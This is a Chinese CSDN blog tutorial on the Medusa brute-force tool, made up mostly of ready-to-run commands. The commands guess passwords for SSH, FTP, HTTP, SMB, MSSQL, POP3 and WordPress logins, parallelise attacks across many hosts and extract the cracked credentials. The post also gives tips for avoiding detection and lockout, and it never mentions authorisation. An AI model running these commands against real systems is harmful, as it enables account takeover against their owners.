Medusa

已于 2025-04-24 14:16:03 修改
阅读量287 收藏 5
点赞数 10
分类专栏: Kali骇客工具教程 文章标签: Medusa kali 黑客
于 2025-04-24 14:15:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FaceMarkMan/article/details/147477556
版权

Medusa 使用指南:基础与进阶方法

一、基础使用方法

1. 基本命令结构

medusa -h [目标IP] -u [用户名] -P [密码字典] -M [协议模块] [选项]

2. 最常用参数组合

medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh -t 4 -T 4 -f -e ns -v 3
  • -t 4:同时测试4台主机
  • -T 4:每台主机4个线程
  • -f:发现有效凭证后停止
  • -e ns:检查空密码和密码=用户名的情况
  • -v 3:中等详细输出

3. 常用协议破解示例

SSH破解
medusa -h 10.0.0.5 -u root -P /usr/share/wordlists/rockyou.txt -M ssh
FTP破解
medusa -H hosts.txt -U common_users.txt -P top_passwords.txt -M ftp -n 2121
HTTP基础认证
medusa -h www.target.com -u admin -P passwords.txt -M http -m DIR:/admin

二、进阶使用方法

1. 组合攻击技术

用户名密码组合文件
medusa -H targets.txt -C user_pass_combos.txt -M smbnt

user_pass_combos.txt格式:

username1:password1
username2:password2
多条件组合
medusa -h 192.168.1.100 -U users.txt -P "Summer2023,Winter2023,Spring2023" -M mssql -e ns -r 1
  • -r 1:失败后1秒重试
  • 直接指定多个密码尝试

2. 高级参数配置

超时控制
medusa -h mail.server.com -u user -P passlist.txt -M pop3 -s -w 3
  • -w 3:响应超时设为3秒
端口扫描+爆破组合
# 先用nmap扫描开放服务
nmap -p 21,22,80,3306 192.168.1.100

# 根据结果针对性爆破
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ftp,ssh,http,mysql -T 8

3. 特殊模块使用

WordPress后台爆破
medusa -h blog.example.com -U wp_users.txt -P wp_passwords.txt -M http -m FORM:"wp-login.php" -m DENY-SIGNAL:"login_error" -m FORM-DATA:"post?log=^USER^&pwd=^PASS^" -e ns
数据库特定破解
medusa -h db.server.com -u sa -P sql_pass.txt -M mssql -m DB:"master" -n 1433

4. 性能优化技巧

大规模分布式爆破
# 分割字典文件后并行执行
split -l 10000 big_passwords.txt pass_part_
for part in pass_part_*; do
  medusa -H targets.txt -U users.txt -P $part -M ssh -T 8 -o results_$part.log &
done
结果筛选与分析
# 提取成功的尝试
grep "ACCOUNT FOUND" medusa_results.log | awk '{print $4,$6}' > valid_creds.txt

# 统计成功率
grep -c "ACCOUNT FOUND" medusa_results.log

三、实用技巧

  1. 字典优化

    • 优先尝试常见密码组合:-e ns(空密码和密码=用户名)
    • 使用目标相关的密码(如公司名+年份)

  2. 规避检测

    • 使用-r 2增加重试间隔
    • 通过-T控制并发量避免触发锁定机制

  3. 结果管理

    • 使用-O result.log保存结果
    • 结合-f发现有效凭证后立即停止

  4. 协议特定技巧

    # SSH使用密钥爆破
medusa -h 192.168.1.100 -U users.txt -k /path/to/keyfile -M ssh

# HTTP POST请求定制
medusa -h target.com -M http -m FORM:"login.php" -m FORM-DATA:"post?user=^USER^&pass=^PASS^"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值